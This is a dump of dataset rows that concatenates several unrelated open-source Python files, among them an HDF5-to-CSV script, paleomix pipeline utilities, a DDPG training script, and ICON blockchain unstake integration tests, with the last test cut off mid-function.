id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
5168324
|
<filename>xl_auth/oauth/__init__.py<gh_stars>1-10
# -*- coding: utf-8 -*-
"""The OAuth sub-package."""
from __future__ import absolute_import, division, print_function, unicode_literals
from . import client, grant, token, views # noqa
|
StarcoderdataPython
|
3234337
|
<gh_stars>1-10
import os, sys, h5py
import numpy as np
if len(sys.argv) != 2:
print("usage: python reformat_simulation_parameters.py [hdf5 file]")
sys.exit(-1)
filename = sys.argv[1]
fout = open(os.path.join(os.path.dirname(filename), \
'simulation_parameters.csv'), 'w+')
fout.write("parameter,K,N,M,value\n")
print("processing", filename, "...")
f = h5py.File(filename, 'r')
beta = np.array(f['global_concentration'])
pi = np.array(f['local_concentration'])
eta = np.array(f['global_features'])
x = np.array(f['local_features'])
y = np.array(f['observations'])
K = beta.shape[0]
N = pi.shape[0]
M = eta.shape[1]
for k in range(K):
fout.write("beta,%d,,,%f\n" % (k, beta[k]))
for n in range(N):
fout.write("pi,%d,%d,,%f\n" % (k, n, pi[n,k]))
for m in range(M):
fout.write("x,%d,%d,%d,%f\n" % (k, n, m, x[n,k,m]))
for m in range(M):
fout.write("eta,%d,,%d,%f\n" % (k, m, eta[k,m]))
for n in range(N):
for m in range(M):
fout.write("y,,%d,%d,%f\n" % (n, m, y[n,m]))
fout.close()
|
StarcoderdataPython
|
1976448
|
#!/usr/bin/python3
#
# Copyright (c) 2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
from typing import IO, Dict, Iterable, Set, Tuple, Union
from paleomix.common.versions import RequirementError
from paleomix.node import Node
from paleomix.nodegraph import FileStatusCache, NodeGraph
from humanfriendly.terminal import ansi_wrap, terminal_supports_colors
def input_files(nodes: Iterable[Node], file: IO[str] = sys.stdout) -> int:
input_files: Set[str] = set()
output_files: Set[str] = set()
graph, _ = _create_graph(nodes)
for node in graph.iterflat():
for filename in node.input_files:
input_files.add(os.path.abspath(filename))
for filename in node.output_files:
output_files.add(os.path.abspath(filename))
for filename in sorted(input_files - output_files):
print(filename, file=file)
return 0
def output_files(nodes: Iterable[Node], file: IO[str] = sys.stdout) -> int:
output_files: Dict[str, str] = {}
graph, cache = _create_graph(nodes)
def _set_output_file_state(filenames: Iterable[str], state: str):
for filename in filenames:
output_files[os.path.abspath(filename)] = state
for node in graph.iterflat():
state = graph.get_node_state(node)
if state == NodeGraph.DONE:
_set_output_file_state(node.output_files, "Ready ")
continue
# Pending/queued nodes may have outdated output files
missing_files = frozenset(cache.missing_files(node.output_files))
_set_output_file_state(missing_files, "Missing ")
_set_output_file_state(node.output_files - missing_files, "Outdated ")
for filename, state in sorted(output_files.items()):
print(state, filename, file=file)
return 0
def required_executables(nodes: Iterable[Node], file: IO[str] = sys.stdout) -> int:
graph, _ = _create_graph(nodes)
template = " {: <20s} {: <11s} {}"
print(template.format("Executable", "Version", "Required version"), file=file)
for requirement in sorted(graph.requirements, key=lambda it: it.name.lower()):
try:
version = requirement.version_str()
except RequirementError:
version = "ERROR"
print(
template.format(requirement.name, version, requirement.specifiers),
file=file,
)
return 0
def pipeline_tasks(tasks: Iterable[Node], file: IO[str] = sys.stdout) -> int:
graph, _ = _create_graph(tasks)
top_tasks = []
for task, rev_deps in graph._reverse_dependencies.items():
if not rev_deps:
top_tasks.append(task)
# Sort by negative ID to prevent leaf tasks created in the middle of a pipeline
# from being shown first. These tasks typically generate reports/files for the user.
top_tasks.sort(key=lambda task: -task.id)
printer = _TaskPrinter(graph, file)
cache = set()
for task in top_tasks:
printer.print(task)
return 0
class _TaskPrinter:
def __init__(self, graph: NodeGraph, file: IO[str]) -> None:
self._cache = set()
self._graph = graph
self._file = file
self.supports_colors = terminal_supports_colors()
def print(self, task: Node, indent: int = 0) -> None:
text = "{}+ {}".format(" " * indent, task)
if self._is_task_done(task):
text = self._color_done(text)
print(text, file=self._file)
self._cache.add(task)
skipped_tasks = 0
skipped_tasks_done = True
for subtask in task.dependencies:
if subtask in self._cache:
skipped_tasks += 1
skipped_tasks_done &= self._is_task_done(subtask)
continue
self.print(subtask, indent + 4)
if skipped_tasks:
text = "{}+ {} sub-task(s) ...".format(" " * (indent + 4), skipped_tasks)
if skipped_tasks_done:
text = self._color_done(text)
print(text, file=self._file)
def _is_task_done(self, task: Node) -> bool:
return self._graph.get_node_state(task) == self._graph.DONE
def _color_done(self, value: Union[str, Node]) -> str:
if self.supports_colors:
return ansi_wrap(str(value), color="black", bold=True)
return str(value)
def _create_graph(nodes: Iterable[Node]) -> Tuple[NodeGraph, FileStatusCache]:
cache = FileStatusCache()
graph = NodeGraph(
nodes=nodes,
implicit_dependencies=True,
cache_factory=lambda: cache,
)
return graph, cache
|
StarcoderdataPython
|
3562903
|
"""
Configuration settings for the Værmelder Python console app.
See
https://docs.microsoft.com/en-us/graph/auth-register-app-v2
for further information and a tutorial.
"""
"""
Azure Active Directory app client id.
Caution:
Changes required.
Edit this with your generated and secret id.
"""
CLIENT_ID = '<INSERT CLIENT ID>'
"""
App name.
No changes required.
"""
APP_NAME = 'vaermelder-python'
"""
Authority url.
No changes required.
"""
AUTHORITY_URL = 'https://login.microsoftonline.com/common'
"""
Resource identifier url.
No changes required.
"""
RESOURCE = 'https://graph.microsoft.com'
|
StarcoderdataPython
|
8155997
|
<gh_stars>0
"""
Run PyTorch DDPG on HalfCheetah.
"""
import random
from railrl.exploration_strategies.base import \
PolicyWrappedWithExplorationStrategy
from railrl.exploration_strategies.ou_strategy import OUStrategy
from railrl.launchers.launcher_util import run_experiment
from railrl.torch.networks import FeedForwardQFunction, FeedForwardPolicy
from railrl.torch.ddpg.ddpg import DDPG
import railrl.torch.pytorch_util as ptu
from rllab.envs.mujoco.half_cheetah_env import HalfCheetahEnv
from rllab.envs.normalized_env import normalize
def example(variant):
env = HalfCheetahEnv()
if variant['normalize']:
env = normalize(env)
es = OUStrategy(action_space=env.action_space)
qf = FeedForwardQFunction(
int(env.observation_space.flat_dim),
int(env.action_space.flat_dim),
32,
32,
)
policy = FeedForwardPolicy(
int(env.observation_space.flat_dim),
int(env.action_space.flat_dim),
32,
32,
)
exploration_policy = PolicyWrappedWithExplorationStrategy(
exploration_strategy=es,
policy=policy,
)
algorithm = DDPG(
env,
qf=qf,
policy=policy,
exploration_policy=exploration_policy,
**variant['algo_params']
)
algorithm.to(ptu.device)
algorithm.train()
if __name__ == "__main__":
# noinspection PyTypeChecker
variant = dict(
algo_params=dict(
num_epochs=99,
num_steps_per_epoch=10000,
num_steps_per_eval=1000,
use_soft_update=True,
tau=1e-2,
batch_size=128,
max_path_length=1000,
discount=0.99,
qf_learning_rate=1e-3,
policy_learning_rate=1e-4,
),
version="PyTorch - bigger networks",
normalize=False,
size='32',
)
for _ in range(3):
seed = random.randint(0, 999999)
run_experiment(
example,
exp_prefix="ddpg-half-cheetah-check-clean",
seed=seed,
mode='ec2',
variant=variant,
use_gpu=False,
)
|
StarcoderdataPython
|
8092989
|
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""IconScoreEngine testcase
"""
import json
import os
from typing import TYPE_CHECKING, List, Tuple
from unittest.mock import patch
from iconservice.icon_constant import Revision, ICX_IN_LOOP, ConfigKey
from iconservice.icx.coin_part import CoinPart, CoinPartFlag
from iconservice.icx.stake_part import StakePart
from iconservice.icx.unstake_patcher import INVALID_EXPIRED_UNSTAKES_FILENAME
from iconservice.icx.unstake_patcher import UnstakePatcher, Target
from tests.integrate_test.iiss.test_iiss_base import TestIISSBase
if TYPE_CHECKING:
from iconservice.iconscore.icon_score_result import TransactionResult
from tests.integrate_test.test_integrate_base import EOAAccount
class TestIISSUnStake1(TestIISSBase):
def test_unstake_balance_rev_10(self):
self._test_unstake_balance(
rev=Revision.FIX_UNSTAKE_BUG.value,
expected_expired_unstake_cnt=2,
expected_last_balance=0
)
def test_unstake_balance_rev_11(self):
self._test_unstake_balance(
rev=Revision.FIX_BALANCE_BUG.value,
expected_expired_unstake_cnt=3,
expected_last_balance=1 * ICX_IN_LOOP
)
def _test_unstake_balance(
self,
rev: int,
expected_expired_unstake_cnt: int,
expected_last_balance: int
):
self.init_decentralized()
self.init_inv()
# gain 10 icx
balance: int = 10 * ICX_IN_LOOP
self.distribute_icx(
accounts=self._accounts[:1],
init_balance=balance
)
# set stake
target_stake: int = 8
stake: int = target_stake * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(
from_=self._accounts[0],
value=stake
)
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
for i in range(6):
self.set_stake(
from_=self._accounts[0],
value=stake - (i+1) * ICX_IN_LOOP
)
last_balance: int = self.get_balance(self._accounts[0])
actual_res: dict = self.get_stake(self._accounts[0])
first_remaining_blocks: int = 14
expected_res = {
"stake": stake - 1 * ICX_IN_LOOP * 6,
"unstakes": [
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 70, "remainingBlocks": first_remaining_blocks},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 71, "remainingBlocks": first_remaining_blocks+1},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 72, "remainingBlocks": first_remaining_blocks+2},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": first_remaining_blocks+3},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": first_remaining_blocks+4},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": first_remaining_blocks+5},
]
}
self.assertEqual(expected_res, actual_res)
self.set_revision(rev)
# 1st expired unstake
self.make_empty_blocks(first_remaining_blocks)
res: dict = self.get_stake(self._accounts[0])
expected_res = {
"stake": stake - 1 * ICX_IN_LOOP * 6,
"unstakes": [
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 71, "remainingBlocks": 0},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 72, "remainingBlocks": 1},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": 2},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 3},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 4},
]
}
self.assertEqual(res, expected_res)
tx_results = self.transfer_icx(from_=self._accounts[0], to_=self._accounts[1], value=0)
res: dict = self.get_stake(self._accounts[0])
expected_res = {
"stake": stake - 1 * ICX_IN_LOOP * 6,
"unstakes": [
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 72, "remainingBlocks": 0},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": 1},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 2},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 3},
]
}
self.assertEqual(res, expected_res)
estimate_fee = tx_results[1].step_used * tx_results[1].step_price
# 2nd expired unstake
self.make_empty_blocks(1)
res: dict = self.get_stake(self._accounts[0])
expected_res = {
"stake": stake - 1 * ICX_IN_LOOP * 6,
"unstakes": [
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": 0},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 1},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 2},
]
}
self.assertEqual(res, expected_res)
current_balance: int = self.get_balance(self._accounts[0])
expected_expired_stake_balance: int = 1 * ICX_IN_LOOP * expected_expired_unstake_cnt
expected_balance: int = last_balance + expected_expired_stake_balance - estimate_fee
self.assertEqual(current_balance, expected_balance)
self.transfer_icx(
from_=self._accounts[0],
to_=self._accounts[1],
value=expected_balance-estimate_fee,
disable_pre_validate=True,
step_limit=100_000,
expected_status=True
)
res: dict = self.get_stake(self._accounts[0])
expected_res = {
"stake": stake - 1 * ICX_IN_LOOP * 6,
"unstakes": [
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 0},
{"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 1},
]
}
self.assertEqual(res, expected_res)
balance: int = self.get_balance(self._accounts[0])
self.assertEqual(balance, expected_last_balance)
class TestIISSUnStake2(TestIISSBase):
def tearDown(self):
super().tearDown()
names: List[str] = INVALID_EXPIRED_UNSTAKES_FILENAME.split(".")
log_dir = "."
report_path: str = os.path.join(log_dir, f"{names[0]}_report.json")
if os.path.isfile(report_path):
os.remove(report_path)
def _setup(
self,
init_balance: int,
stake: int,
unstake_count: int = 1,
account_count: int = 1
) -> list:
self.init_decentralized()
self.init_inv()
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# gain 150 icx
self.distribute_icx(
accounts=self._accounts[:account_count],
init_balance=init_balance
)
for i in range(account_count):
self._accounts[i].balance = init_balance
# Balance | Stake | UnStake | Expired_icx
# 150 icx | 0 icx | 0 icx | 0 icx
# set stake
tx_list = []
for i in range(account_count):
tx = self.create_set_stake_tx(from_=self._accounts[i], value=stake)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - stake - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
self._accounts[i].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 100 icx | 0 icx | 0 icx
# unstake (unstake_count - 1) times
tx_list = []
unstake = stake // unstake_count
for i in range(unstake_count-1):
for j in range(account_count):
unstake_value = (i+1) * unstake
tx = self.create_set_stake_tx(from_=self._accounts[j], value=stake - unstake_value)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for j in range(account_count):
fee = tx_results[j+1].step_used * tx_results[j+1].step_price
expected_balance = self._accounts[i].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[j]))
self._accounts[i].balance = expected_balance
# unstake all staked value
tx_list = []
for i in range(account_count):
tx = self.create_set_stake_tx(from_=self._accounts[i], value=0)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
self._accounts[i].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 0 icx | 100 icx | 0 icx
# wait expire unstake
remaining_blocks = 0
rets = []
for i in range(account_count):
unstakes_info: list = self.get_stake(self._accounts[0]).get("unstakes")
rets.append(unstakes_info)
unstake_info = unstakes_info[-1]
remaining_blocks = unstake_info["remainingBlocks"]
self.make_empty_blocks(remaining_blocks + 1)
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 0 icx | 100 icx(e) | 100 icx
return rets
def test_expired_icx_case1(self):
initial_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
unstakes_info_per_account: list = self._setup(
init_balance=initial_balance,
stake=stake
)
# transfer 10 icx to other account
expired_icx = stake
transfer_value = 10 * ICX_IN_LOOP
tx_results = self.transfer_icx(self._accounts[0], self._accounts[1], transfer_value)
fee = tx_results[1].step_used * tx_results[1].step_price
transfer_fee: int = fee
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstakes_info = [expired_unstake]
# Balance | Stake | UnStake | Expired_icx
# 40 icx | 0 icx | 100 icx(e) | 100 icx
self._check_expired_icx(expired_icx, expired_unstakes_info)
# gain unstaked icx
# Balance | Stake | UnStake | Expired_icx
# 140 icx | 0 icx | 100 icx(e) | 0 icx
expected_balance = self._accounts[0].balance - transfer_value - fee + stake
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# set stake to 30
stake = 30 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(
from_=self._accounts[0],
value=stake
)
fee = tx_results[1].step_used * tx_results[1].step_price
# Balance | Stake | UnStake | Expired_icx
# 210 icx | 30 icx | 0 icx | 0 icx
expected_balance = self._accounts[0].balance - stake - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
response_stake = self.get_stake(self._accounts[0])
self.assertEqual(stake, response_stake["stake"])
self._check_expired_icx_release()
# account can transfer invalid expired icx all
self.transfer_icx(
self._accounts[0],
self._accounts[1],
self._accounts[0].balance - transfer_fee,
step_limit=100_000,
)
actual_balance: int = self.get_balance(account=self._accounts[0])
self.assertEqual(0, actual_balance)
# Balance | Stake | UnStake | Expired_icx
# 0 icx | 30 icx | 0 icx | 0 icx
response_stake = self.get_stake(self._accounts[0])
self.assertEqual(stake, response_stake["stake"])
self._check_expired_icx_release()
def test_multiple_expired_icx(self):
initial_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
unstakes_info_per_account: list = self._setup(
init_balance=initial_balance,
stake=stake,
unstake_count=2
)
# transfer 10 icx to other account
expired_icx = stake
transfer_value = 10 * ICX_IN_LOOP
tx_results = self.transfer_icx(
self._accounts[0],
self._accounts[1],
transfer_value
)
fee = tx_results[1].step_used * tx_results[1].step_price
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake1 = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstake2 = (
account0_unstakes_info[1]["unstake"],
account0_unstakes_info[1]["unstakeBlockHeight"]
)
expired_unstakes_info = [expired_unstake1, expired_unstake2]
# Balance | Stake | UnStake | Expired_icx
# 40 icx | 0 icx | 100 icx(e) | 100 icx
self._check_expired_icx(expired_icx, expired_unstakes_info)
# gain unstaked icx
# Balance | Stake | UnStake | Expired_icx
# 140 icx | 0 icx | 100 icx(e) | 0 icx
expected_balance = self._accounts[0].balance - transfer_value - fee + stake
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# fix unstake bug
self.set_revision(Revision.FIX_UNSTAKE_BUG.value)
# transfer 10 icx to other account
transfer_value = 10 * ICX_IN_LOOP
tx_results = self.transfer_icx(
self._accounts[0],
self._accounts[1],
transfer_value
)
fee = tx_results[1].step_used * tx_results[1].step_price
transfer_fee: int = fee
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake1 = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstake2 = (
account0_unstakes_info[1]["unstake"],
account0_unstakes_info[1]["unstakeBlockHeight"]
)
expired_unstakes_info = [expired_unstake1, expired_unstake2]
self._check_expired_icx(expired_icx, expired_unstakes_info)
# invalid expired icx will not be produced
# Balance | Stake | UnStake | Expired_icx
# 130 icx | 0 icx | 100 icx(e) | 0 icx
expected_balance = self._accounts[0].balance - transfer_value - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# set stake to 30
stake = 30 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(
from_=self._accounts[0],
value=stake
)
fee = tx_results[1].step_used * tx_results[1].step_price
# Balance | Stake | UnStake | Expired_icx
# 200 icx | 30 icx | 0 icx | 0 icx
expected_balance = self._accounts[0].balance - stake - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
response_stake = self.get_stake(self._accounts[0])
self.assertEqual(stake, response_stake["stake"])
self._check_expired_icx_release()
# account can transfer invalid expired icx all
self.transfer_icx(
self._accounts[0],
self._accounts[1],
self._accounts[0].balance - transfer_fee,
step_limit=100_000,
)
actual_balance: int = self.get_balance(account=self._accounts[0])
self.assertEqual(0, actual_balance)
# Balance | Stake | UnStake | Expired_icx
# 0 icx | 30 icx | 0 icx | 0 icx
response_stake = self.get_stake(self._accounts[0])
self.assertEqual(stake, response_stake["stake"])
self._check_expired_icx_release()
def test_expired_icx_case2_1_gain_icx(self):
initial_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
unstakes_info_per_account: list = self._setup(
init_balance=initial_balance,
stake=stake
)
# delegation
expired_icx: int = stake
def set_delegation():
_tx_results: List["TransactionResult"] = self.set_delegation(
from_=self._accounts[0],
origin_delegations=[
(
self._accounts[0],
0
)
]
)
_fee = _tx_results[1].step_used * _tx_results[1].step_price
_expected_balance = self._accounts[0].balance - _fee + expired_icx
self.assertEqual(_expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = _expected_balance
set_delegation()
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstake_info = [expired_unstake]
# check expired_icx 1
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstake_info
)
# Balance | Stake | UnStake | Expired_icx
# 150 icx | 0 icx | 100 icx(e) | 100 icx
set_delegation()
# check expired_icx 2
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstake_info
)
# Balance | Stake | UnStake | Expired_icx
# 250 icx | 0 icx | 100 icx(e) | 100 icx
# Fix Unstake Bug
self.set_revision(Revision.FIX_UNSTAKE_BUG.value)
# Try Again
set_delegation()
# check expired_icx 3
self._check_expired_icx_release()
# Balance | Stake | UnStake | Expired_icx
# 350 icx | 0 icx | 0 icx(e) | 0 icx
tx_results: List["TransactionResult"] = self.set_delegation(
from_=self._accounts[0],
origin_delegations=[
(
self._accounts[0],
0
)
]
)
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# check expired_icx 4
self._check_expired_icx_release()
# Balance | Stake | UnStake | Expired_icx
# 350 icx | 0 icx | 0 icx(e) | 0 icx
def test_expired_icx_case2_2_transfer_icx(self):
initial_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
unstakes_info_per_account: list = self._setup(
init_balance=initial_balance,
stake=stake
)
expired_icx: int = stake
# transfer icx 10
transfer_value = 10 * ICX_IN_LOOP
tx_results = self.transfer_icx(self._accounts[0], self._accounts[1], transfer_value)
fee = tx_results[1].step_used * tx_results[1].step_price
transfer_fee: int = fee
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstakes_info = [expired_unstake]
# Balance | Stake | UnStake | Expired_icx
# 40 icx | 0 icx | 100 icx(e) | 100 icx
self._check_expired_icx(expired_icx, expired_unstakes_info)
self._accounts[0].balance = self.get_balance(self._accounts[0])
# delegation
def set_delegation():
_tx_results: List["TransactionResult"] = self.set_delegation(
from_=self._accounts[0],
origin_delegations=[
(
self._accounts[0],
0
)
]
)
_fee = _tx_results[1].step_used * _tx_results[1].step_price
expected_balance = self._accounts[0].balance - _fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
set_delegation()
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstake_info = [expired_unstake]
# check expired_icx 1
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstake_info
)
# Balance | Stake | UnStake | Expired_icx
# 140 icx | 0 icx | 100 icx(e) | 100 icx
set_delegation()
# check expired_icx 2
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstake_info
)
# Balance | Stake | UnStake | Expired_icx
# 240 icx | 0 icx | 100 icx(e) | 100 icx
# account can transfer invalid expired icx all
self.transfer_icx(
self._accounts[0],
self._accounts[1],
self._accounts[0].balance - transfer_fee,
step_limit=100_000,
)
actual_balance: int = self.get_balance(account=self._accounts[0])
self.assertEqual(0, actual_balance)
# Balance | Stake | UnStake | Expired_icx
# 0 icx | 0 icx | 0 icx | 100 icx
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstake_info
)
def _get_account_info(self, account: 'EOAAccount') -> dict:
c_key: bytes = CoinPart.make_key(account.address)
value: bytes = self.get_state_db(c_key)
coin_part: 'CoinPart' = CoinPart.from_bytes(value)
s_key: bytes = StakePart.make_key(account.address)
value: bytes = self.get_state_db(s_key)
state_part: 'StakePart' = StakePart.from_bytes(value)
return {
"coin": coin_part,
"stake": state_part
}
def _check_expired_icx(self, expired_icx: int,
expired_unstakes_info: List[Tuple[int, int]], account_count: int = 1):
for i in range(account_count):
get_stake_info: dict = self.get_stake(self._accounts[i])
self.assertNotIn("unstakes", get_stake_info)
db_info: dict = self._get_account_info(self._accounts[i])
unstakes_info: list = db_info["stake"]._unstakes_info
flag: CoinPartFlag = db_info["coin"].flags
self.assertEqual(CoinPartFlag.NONE, flag)
self.assertGreaterEqual(len(unstakes_info), 1)
expired_unstake = 0
for j, unstake_info in enumerate(expired_unstakes_info):
expired_unstake += unstake_info[0]
self.assertEqual(unstake_info[0], unstakes_info[j][0])
self.assertEqual(unstake_info[1], unstakes_info[j][1])
self.assertEqual(expired_icx, expired_unstake)
def _check_expired_icx_release(self, account_count: int = 1):
for i in range(account_count):
get_stake_info: dict = self.get_stake(self._accounts[i])
self.assertNotIn("unstakes", get_stake_info)
db_info: dict = self._get_account_info(self._accounts[i])
unstakes_info: list = db_info["stake"]._unstakes_info
flag: CoinPartFlag = db_info["coin"].flags
self.assertEqual(CoinPartFlag.NONE, flag)
self.assertEqual(0, len(unstakes_info))
def test_fix_bug_rev11_all_success(self):
account_count: int = 5
initial_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
unstakes_info_per_account: list = self._setup(
init_balance=initial_balance,
stake=stake,
account_count=account_count
)
# delegation
expired_icx: int = stake
tx_list = []
for i in range(account_count):
tx = self.create_set_delegation_tx(
from_=self._accounts[i],
origin_delegations=[
(
self._accounts[i],
0
)
]
)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
# check expired_icx 1
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstakes_info = [expired_unstake]
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstakes_info,
account_count=account_count
)
src: list = []
for i in range(account_count):
db_info: dict = self._get_account_info(self._accounts[0])
stake_part: 'StakePart' = db_info["stake"]
data: dict = {
"address": str(self._accounts[i].address),
"total_unstake": stake_part._stake + stake_part._total_unstake(),
"old_unstake_format": False,
"unstakes": [
[
stake_part._unstakes_info[0][0],
stake_part._unstakes_info[0][1]
],
]
}
src.append(data)
targets: List[Target] = [Target.from_dict(i) for i in src]
patcher = UnstakePatcher(targets=targets)
with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
from_path_mock.return_value = patcher
self.set_revision(Revision.FIX_BALANCE_BUG.value)
self._check_expired_icx_release(account_count=account_count)
# Retry
# sync balance
for i in range(account_count):
self._accounts[i].balance = self.get_balance(self._accounts[i])
# set stake
tx_list = []
for i in range(account_count):
tx = self.create_set_stake_tx(from_=self._accounts[i], value=stake)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - stake - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
self._accounts[i].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 100 icx | 0 icx | 0 icx
# unstake (unstake_count - 1) times
